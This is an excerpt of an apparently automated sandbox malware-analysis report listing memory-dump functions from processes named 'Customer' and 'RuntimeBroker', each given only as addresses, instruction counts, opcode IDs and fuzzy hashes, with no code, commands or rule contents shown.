                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c0de31ff55dac23b95a811c137c46e9e92c941f9d0cde17c9f0cb30f5e18ab9a
                                                                                                      • Instruction ID: 5f491a3327a5f2f57bae050deeec495b14a068e1376892ceec0a54cf358f2eaa
                                                                                                      • Opcode Fuzzy Hash: c0de31ff55dac23b95a811c137c46e9e92c941f9d0cde17c9f0cb30f5e18ab9a
                                                                                                      • Instruction Fuzzy Hash: A4110332B2AE0AAFE6B456BC946C1A0B3D1FF60216B452177D508C25B1EE3AB991C340
                                                                                                      Function 00007FFD9B98DC40 Relevance: .1, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 87f8ea0e88049ea24fc654d677dbc2d0126cf4afb7eba5f9bf3409d57771cee4
                                                                                                      • Instruction ID: 913c1d41fea97a4158cf0e1779aebcb8853ff59e7962feaca3184f23cd576e8b
                                                                                                      • Opcode Fuzzy Hash: 87f8ea0e88049ea24fc654d677dbc2d0126cf4afb7eba5f9bf3409d57771cee4
                                                                                                      • Instruction Fuzzy Hash: B611D361B2AD4D2FE7A8F76880617BA23C2EFC8350F00487DD05EC72B6CD78A9014380
                                                                                                      Function 00007FFD9B98EC71 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7fb2dd0957150782ff12f9908966cb1393a7e2548989059870b623402b4faddc
                                                                                                      • Instruction ID: dea04c3581cda6235dce4005d24b0c3891a59fbc15057ec2d2153d4ae88a99e4
                                                                                                      • Opcode Fuzzy Hash: 7fb2dd0957150782ff12f9908966cb1393a7e2548989059870b623402b4faddc
                                                                                                      • Instruction Fuzzy Hash: CF110461E2EC8A6FE378D75894B25B53BD1EF64314F0504B8C05D4B9B3E928BA0B8640
                                                                                                      Function 00007FFD9B989B9E Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 738593276676cf4fd15c64ab587daf0946d33d46ee9141f4710c45fd8138d973
                                                                                                      • Instruction ID: 34b7deb9399826f079aa64ada353f73c6f1e55b010e010f9af27569c7b5b0643
                                                                                                      • Opcode Fuzzy Hash: 738593276676cf4fd15c64ab587daf0946d33d46ee9141f4710c45fd8138d973
                                                                                                      • Instruction Fuzzy Hash: 64014C30729E098FDBA8EB7C90689A5B3E1FF543057412479D00BC26A2CE36F981C740
                                                                                                      Function 00007FFD9B9877C5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0fc9062f0b3034d68015f5999e89ade11903daa1410e8985b7874104d23aff41
                                                                                                      • Instruction ID: 46a3ed60a908accee19f8d4b28a5a8560484f8dfb6fecefb3f99733387014f67
                                                                                                      • Opcode Fuzzy Hash: 0fc9062f0b3034d68015f5999e89ade11903daa1410e8985b7874104d23aff41
                                                                                                      • Instruction Fuzzy Hash: C101677121CB0C4FD748EF0CE451AA6B7E0FB95364F10056DE59AC36A5DA36E882CB45
                                                                                                      Function 00007FFD9B9918A5 Relevance: .0, Instructions: 46COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f7021ba310b5e36b989e635ca97d2ebcf64ec4e73fb3601dcffc86b10aa24eee
                                                                                                      • Instruction ID: f1c3e54f075a2ff7a4a0bd51b99f5527d360b6328c4e64c8e0f527a4ba1f0da0
                                                                                                      • Opcode Fuzzy Hash: f7021ba310b5e36b989e635ca97d2ebcf64ec4e73fb3601dcffc86b10aa24eee
                                                                                                      • Instruction Fuzzy Hash: 6201DF3090CB889FDB55DF688854999BFF0FF8A310B0A42EEE089C71A2CB34D944C741
                                                                                                      Function 00007FFD9B98A51F Relevance: .0, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a786394ab15e416757df2796689014fea5fe5cc5a7f4f567581365c23595eaa1
                                                                                                      • Instruction ID: 8a79ed31fbd419855c1b33e40b9d483d41add513a43e9fdca5210a7f8dcf6850
                                                                                                      • Opcode Fuzzy Hash: a786394ab15e416757df2796689014fea5fe5cc5a7f4f567581365c23595eaa1
                                                                                                      • Instruction Fuzzy Hash: 98F06261B18D0E4FD794E65CD0A0AA573D2FFD8310B608275D01DC729ADD39EC824740
                                                                                                      Function 00007FFD9B98DD3B Relevance: .0, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b8fb20b0416c2496aa4cad8a528ba61bcfee48622737411d1477f4b3adf1b85f
                                                                                                      • Instruction ID: 09ce4a41f3bbe937e7e9a7e862f35d2b5de5862051fe30888ad4c75ad6882366
                                                                                                      • Opcode Fuzzy Hash: b8fb20b0416c2496aa4cad8a528ba61bcfee48622737411d1477f4b3adf1b85f
                                                                                                      • Instruction Fuzzy Hash: EB01CD3049D7C98FC7479F3898558E17FB0EE17210B0601DBE499CB0A3D728495ACB92
                                                                                                      Function 00007FFD9B9880BF Relevance: .0, Instructions: 41COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 765e1c7f59317c9265a38807ce722d3bc6b434e209441d707978ca57dd12904c
                                                                                                      • Instruction ID: 95f120c080d977ea9afb32e381e34365de1865640f319235640fe1b266701c76
                                                                                                      • Opcode Fuzzy Hash: 765e1c7f59317c9265a38807ce722d3bc6b434e209441d707978ca57dd12904c
                                                                                                      • Instruction Fuzzy Hash: 10F0303271CB448FDB5CAA1CF4519B973D1EB95324B10062EF08BC2696DA26E8468646
                                                                                                      Function 00007FFD9B9867F8 Relevance: .0, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 60f5eeb291c82d138a538fef758002391f437f4775c4e11df4d95796d0da9476
                                                                                                      • Instruction ID: 108bc935ec5ecca70b8e95402e231a9d3906ae4a17fa38d29c99b64f73654cf2
                                                                                                      • Opcode Fuzzy Hash: 60f5eeb291c82d138a538fef758002391f437f4775c4e11df4d95796d0da9476
                                                                                                      • Instruction Fuzzy Hash: 30F0303275CA088FDB5CAA1CF8529B573D1EB99324B10016EE48BC2696D927E8468786
                                                                                                      Function 00007FFD9BA554ED Relevance: .0, Instructions: 37COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e24f2f4430bf60482b297b704f24c6fea0ba9216854927734e98443a5c1df7e2
                                                                                                      • Instruction ID: a10037419733d0993e8b1c55dc38d3693c7615d4b3c2f64cfa932f38be16ff7d
                                                                                                      • Opcode Fuzzy Hash: e24f2f4430bf60482b297b704f24c6fea0ba9216854927734e98443a5c1df7e2
                                                                                                      • Instruction Fuzzy Hash: A4F0BE32B0E5098FD768EB9CE8519A873E1FF4532071500BAE06DC71B7CA65ED40C740
                                                                                                      Function 00007FFD9B984B3C Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 78814c7246f499a77aa6d30d14f37cefcdc2e389ba98df90ea710e4fc15db1fe
                                                                                                      • Instruction ID: 5ffe0684cef9e8b8051d42739e477b7c35a06be46a8a056c2198c8d5b65686df
                                                                                                      • Opcode Fuzzy Hash: 78814c7246f499a77aa6d30d14f37cefcdc2e389ba98df90ea710e4fc15db1fe
                                                                                                      • Instruction Fuzzy Hash: 3BE09B00F3FA9A1AEAB553F918393B81FC09F41610F4945FED45DC72F2E85D5D858242
                                                                                                      Function 00007FFD9BA509B6 Relevance: .0, Instructions: 34COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781717309.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba50000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 012d8b854ac7e73ce0652b6c7e1f36730e32ca5696472f24e32d94f0dce83654
                                                                                                      • Instruction ID: 61705f45c79f6dcdf08ddc622bac68403a7b678411c2da1880fad691fbda9f35
                                                                                                      • Opcode Fuzzy Hash: 012d8b854ac7e73ce0652b6c7e1f36730e32ca5696472f24e32d94f0dce83654
                                                                                                      • Instruction Fuzzy Hash: 78E0E532B0B91D8FEB68C69C94905BCB3D0EF59661706007BD50EC3262C940A9418780
                                                                                                      Function 00007FFD9B981EDB Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5b4edc53ca77f037699d44ee5357dcca30ffc0841bc7635352d055bb40f1645b
                                                                                                      • Instruction ID: d8c27b2463270e861c694eb109ea1e5a60ffebe949d93b9d40e7d072a87e748a
                                                                                                      • Opcode Fuzzy Hash: 5b4edc53ca77f037699d44ee5357dcca30ffc0841bc7635352d055bb40f1645b
                                                                                                      • Instruction Fuzzy Hash: E8F0ED30615A0C8FD348EF28C844A9133A0FF09308F4000AAEC4CC7392DA3AEAE1CB81
                                                                                                      Function 00007FFD9B98DCE7 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b5dfacf48bf57de4e2d7dd980f0fb1cd925051839fdeb10c3ed5614f6bc6f906
                                                                                                      • Instruction ID: dbfd7f7c29cc54f9cd88e16a503e71fbb42e5bb308f19e2131bccfe5aa56d595
                                                                                                      • Opcode Fuzzy Hash: b5dfacf48bf57de4e2d7dd980f0fb1cd925051839fdeb10c3ed5614f6bc6f906
                                                                                                      • Instruction Fuzzy Hash: 63F0823061AB0A9FE336A77890203F57391FF85315F51047DC019862A2C93EA982C740
                                                                                                      Function 00007FFD9B989C0D Relevance: .0, Instructions: 28COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1d25982559a1d26312a3fb451ee906202aa33510ddca078a9301eace20136232
                                                                                                      • Instruction ID: 34eef387f1d597f2aeac4f481e2e04186535ce438936ba6c53a8745901af44ea
                                                                                                      • Opcode Fuzzy Hash: 1d25982559a1d26312a3fb451ee906202aa33510ddca078a9301eace20136232
                                                                                                      • Instruction Fuzzy Hash: F5E08CA581F7E02FCB4363B8886E4E17FA0AD0B23134A05EED0C68F063D1190546C342
                                                                                                      Function 00007FFD9B9834D0 Relevance: .0, Instructions: 20COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5a1c17d464a9a5d7dcabbbcb2fc967f8d4424ecdcba40d8f07dbf50e18b4acf4
                                                                                                      • Instruction ID: efd4b8be572a17dc5005791c5ef11130dff9ee6f2a7171d82c047ec04b19e97c
                                                                                                      • Opcode Fuzzy Hash: 5a1c17d464a9a5d7dcabbbcb2fc967f8d4424ecdcba40d8f07dbf50e18b4acf4
                                                                                                      • Instruction Fuzzy Hash: AAD02B7040C3440BD3545A1654034F47BD0DB512E0B41056EF4D7C5192D52CD7C24663
                                                                                                      Function 00007FFD9B980943 Relevance: .0, Instructions: 17COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6b53b07311d980dc238d8a07483ce9bded76c617ec23386e69b64298e69bd197
                                                                                                      • Instruction ID: 8f830dafd00ea2e4ea693b7e0b1c9eb80ea64cef4c52b4d05d08ec2a5e78482b
                                                                                                      • Opcode Fuzzy Hash: 6b53b07311d980dc238d8a07483ce9bded76c617ec23386e69b64298e69bd197
                                                                                                      • Instruction Fuzzy Hash: 2DC01202B29E0E02A678525E247517823C2EBD8A20B5A03B6A009C329BDC28AC4300D4
                                                                                                      Function 00007FFD9B987D40 Relevance: .0, Instructions: 8COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2a671d9e812a74f955029cef67af56e6e8d5f202f66ae87b33f2cca0916250a2
                                                                                                      • Instruction ID: 8ef6005be09925560d6a0b0290610ce4c83268f8eb8f8d0e1577d8096c4b487a
                                                                                                      • Opcode Fuzzy Hash: 2a671d9e812a74f955029cef67af56e6e8d5f202f66ae87b33f2cca0916250a2
                                                                                                      • Instruction Fuzzy Hash: CCB0121186543901E7087AC9B9534F433409B443D5F020865EC048E193D42D53F241A5

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9B9893FA Relevance: .5, Instructions: 486COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8832086069aac62c67d5245d7f9b7b8a8364d3243d60e987927a9977423bba3e
                                                                                                      • Instruction ID: 2947c770e610fbd4e8709c400db1ebd6ae410c59cb15916086e8491e03407a9c
                                                                                                      • Opcode Fuzzy Hash: 8832086069aac62c67d5245d7f9b7b8a8364d3243d60e987927a9977423bba3e
                                                                                                      • Instruction Fuzzy Hash: 21E17C62B1FF965FE3159B7C887D4A57BA0FF52720B0901BBC1A9C70E3DD25A8068391

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B9B2298 Relevance: 2.4, Strings: 1, Instructions: 1149COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID: 0-3916222277
                                                                                                      • Opcode ID: ee470c6ae0cc70d06f72350c02e01ce3672c5bb91e99f90421d5283a19c4b450
                                                                                                      • Instruction ID: 3735de0ff09b0b2fb318aa3189b05956f63fe5219a5d6a676cacfaa13f9f7028
                                                                                                      • Opcode Fuzzy Hash: ee470c6ae0cc70d06f72350c02e01ce3672c5bb91e99f90421d5283a19c4b450
                                                                                                      • Instruction Fuzzy Hash: 3682A330F2952E5FEBA8F77884A5A7973D2EF98314F514578D01EC72D6DE28E8428B40
                                                                                                      Function 00007FFD9B9BDA0D Relevance: .7, Instructions: 712COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 97724dedbac9878714d2b433001b6e25ce1010c4b9c0acb59e36cbd39ef1bd5c
                                                                                                      • Instruction ID: 6256930bd642a23e2fd9ca412b60dd9927ad840d872f233d8081b7783e0f5190
                                                                                                      • Opcode Fuzzy Hash: 97724dedbac9878714d2b433001b6e25ce1010c4b9c0acb59e36cbd39ef1bd5c
                                                                                                      • Instruction Fuzzy Hash: EC328330A1996D9FEB98EB68C8A4BA877F1FF59314F0501B9D05DD32A5CE34A981CF01
                                                                                                      Function 00007FFD9B9BB57A Relevance: .7, Instructions: 665COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d73d22d6b855b3915c5938bf7c2e1ecba420674e21004e8dbeeb69816835af56
                                                                                                      • Instruction ID: 2e91fe4a153e4165d3c45de29fb8a0d8f80e8a0ba8c9feeb2770a6c0a92b051e
                                                                                                      • Opcode Fuzzy Hash: d73d22d6b855b3915c5938bf7c2e1ecba420674e21004e8dbeeb69816835af56
                                                                                                      • Instruction Fuzzy Hash: C322FC30B2CA194FE758FB788869A7977D2FF98304F1541BEE05DC32D6DE28A8418742
                                                                                                      Function 00007FFD9B9BC308 Relevance: .6, Instructions: 624COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ed467b978b924ff5ab451cd936be5c3b439af96870fc05288c14780560f99acd
                                                                                                      • Instruction ID: 6c12a9db6d924f230402356791d1f7126ec6f8aa5d78e165368b45ddda95a1c8
                                                                                                      • Opcode Fuzzy Hash: ed467b978b924ff5ab451cd936be5c3b439af96870fc05288c14780560f99acd
                                                                                                      • Instruction Fuzzy Hash: 90320A30E1952D9BDBA8EB64C4A5BF9B3B5FF48304F1145B9D00EA3296CE356A81CF50
                                                                                                      Function 00007FFD9B9B5DF6 Relevance: .5, Instructions: 472COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9eb36f9e0c9eb876aad8ed322f3c704c0693b41599894285e59821542b8f3ccd
                                                                                                      • Instruction ID: b638d9f6c3bb504ca328837e5a2cc7a02ad1e1b293bc5e136475d51bd9baf94e
                                                                                                      • Opcode Fuzzy Hash: 9eb36f9e0c9eb876aad8ed322f3c704c0693b41599894285e59821542b8f3ccd
                                                                                                      • Instruction Fuzzy Hash: 6CF1D730A1DA4E8FEBA8DF28C8657E977D1FF55310F14426EE84DC7295CB34A9418B82
                                                                                                      Function 00007FFD9B9B6BA2 Relevance: .5, Instructions: 458COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6f79b1aba79e1c4260f4deff90e2f318ad3e3532036398edaec3afae62240b04
                                                                                                      • Instruction ID: 4b215e63527555857c4b13646c91aff221cbaa534fba62728fac48ace0ba4065
                                                                                                      • Opcode Fuzzy Hash: 6f79b1aba79e1c4260f4deff90e2f318ad3e3532036398edaec3afae62240b04
                                                                                                      • Instruction Fuzzy Hash: AAE1D330A19A4E8FEBA8DF28C8557E97BD1EF54310F04426ED84DC72A5CB78E9458B81
                                                                                                      Function 00007FFD9B9BCE2D Relevance: .2, Instructions: 185COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7a1e67e72ec167e31ab849c5e2974ac2e76a2951f49de861f62243e86af202c0
                                                                                                      • Instruction ID: c8dfa3af702e0c36998addf554484d0af9296153c3278f9b6e0063a0662c078e
                                                                                                      • Opcode Fuzzy Hash: 7a1e67e72ec167e31ab849c5e2974ac2e76a2951f49de861f62243e86af202c0
                                                                                                      • Instruction Fuzzy Hash: 7A51C870A18A1D9FDB58EF98C4A4AACB7F1FF59305F110169D01EE72A1CB34A981CF40
                                                                                                      Function 00007FFD9B9BC378 Relevance: 4.1, Strings: 3, Instructions: 339COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &$ $I
                                                                                                      • API String ID: 0-2579773881
                                                                                                      • Opcode ID: 423c571d5b136eb17fb6d46ef06074e29b73d18a97531ebcd2c6db0a684f967e
                                                                                                      • Instruction ID: 5fe6d44e67abda906adabeea7be6b4b7096f61f84f6b0b77cf6fee18642f6f60
                                                                                                      • Opcode Fuzzy Hash: 423c571d5b136eb17fb6d46ef06074e29b73d18a97531ebcd2c6db0a684f967e
                                                                                                      • Instruction Fuzzy Hash: F8C1B171E1A66D9FDB65DB58C8A4BACBBB1FF55300F4001BAD04D972A2DE346A85CF00
                                                                                                      Function 00007FFD9B9BC3B8 Relevance: 4.1, Strings: 3, Instructions: 313COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.4124274629.00007FFD9B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_7ffd9b9b0000_RuntimeBroker.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &$ $I
                                                                                                      • API String ID: 0-2579773881
                                                                                                      • Opcode ID: afa665f60199e6aea989e77b343d676288155e8ebc5344f0b4f15618ae88bbe6
